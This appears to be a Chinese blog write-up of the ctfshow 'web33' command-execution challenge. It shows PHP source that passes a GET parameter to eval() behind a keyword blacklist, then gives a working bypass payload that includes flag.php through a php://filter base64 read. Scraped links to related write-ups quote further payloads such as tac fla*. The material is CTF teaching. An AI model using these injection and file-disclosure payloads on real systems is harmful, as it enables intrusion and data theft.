源码

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

解法和上题一样
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

CTFshow 命令执行 web33相关推荐

  1. CTFshow——命令执行

    CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...

  2. CTFshow命令执行29-123

    命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...

  3. CTFshow 命令执行 web72

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

  4. [CTFSHOW]命令执行

    文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...

  5. ctfshow命令执行篇

    web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...

  6. ctfshow命令执行(持续更新,已更至web39)

    做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...

  7. ctfshow 命令执行 web29-web77 web118-122 web124 wp

    南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...

  8. [CTFSHOW]命令执行55-74

    web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...

  9. ctfshow命令执行

    目录 web33:[文件包含] web34: web35: web36:多过滤了0-9的数字,用参数逃逸可以不用数字,用字母就可以成功绕过 ,步骤一样,略 web37: web38: web39: w ...

最新文章

  1. 深度学习在小分子药物研发中的应用
  2. SQLyog连接Mysql8.0提示 Authentication plugin ‘caching_sha2_password‘ cannot be loaded
  3. codeforces1454 F. Array Partition
  4. [vue-element]有阅读过ElementUI的源码吗?
  5. display方法php,ThinkPHP 模板输出 display 方法
  6. CLR via C# ver4.0 读书笔记
  7. 当台式机能搜索到WiFi,但是连不上WiFi时,如何解决?
  8. 0基础实现微信推送天气,生日等(女朋友快乐眼)
  9. 第四章网络安全学习笔记(超详细)
  10. TMB:肿瘤突变负荷简介
  11. vue中directives的用法
  12. 俺也上IPV6了 顺便推荐几个IPV6视频站点
  13. 知乎上的48条神回复
  14. Java递归子集算法(树状结构)的逻辑和实例代码实现 @杨章隐
  15. 深度学习中的深度前馈网络简介
  16. SDWAN与区块链——SDWAN CHEAP
  17. mysql索引长度超过767bytes问题解决。Specified key was too long; max key length is 767 bytes
  18. bp神经网络模型拓扑结构,bp神经网络的建模步骤
  19. MySQL学习6:常用计算函数
  20. Sql Server 使用 SET NOCOUNT { ON | OFF}

热门文章

  1. 数学图形(1.46)高次方程曲线
  2. 从注册流程 分析如何安全退出多个Activity 多种方式(附DEMO)
  3. 怎么卸载Apache_pn服务-PHPnow使用问题
  4. 临时目录 Path.GetTempFileName()
  5. ActiveSync合作关系对话框的配置
  6. java join()源码_Java Thread的join() 之刨根问底
  7. POJ 1150 The Last Non-zero Digit 《挑战程序设计竞赛》
  8. Java Spring Boot 2.0 实战之制作Docker镜像并推送到Docker Hub和阿里云仓库
  9. mysql 开发进阶篇系列 22 磁盘I/O问题(从linux操作系统上优化)
  10. 第十六章--访问文件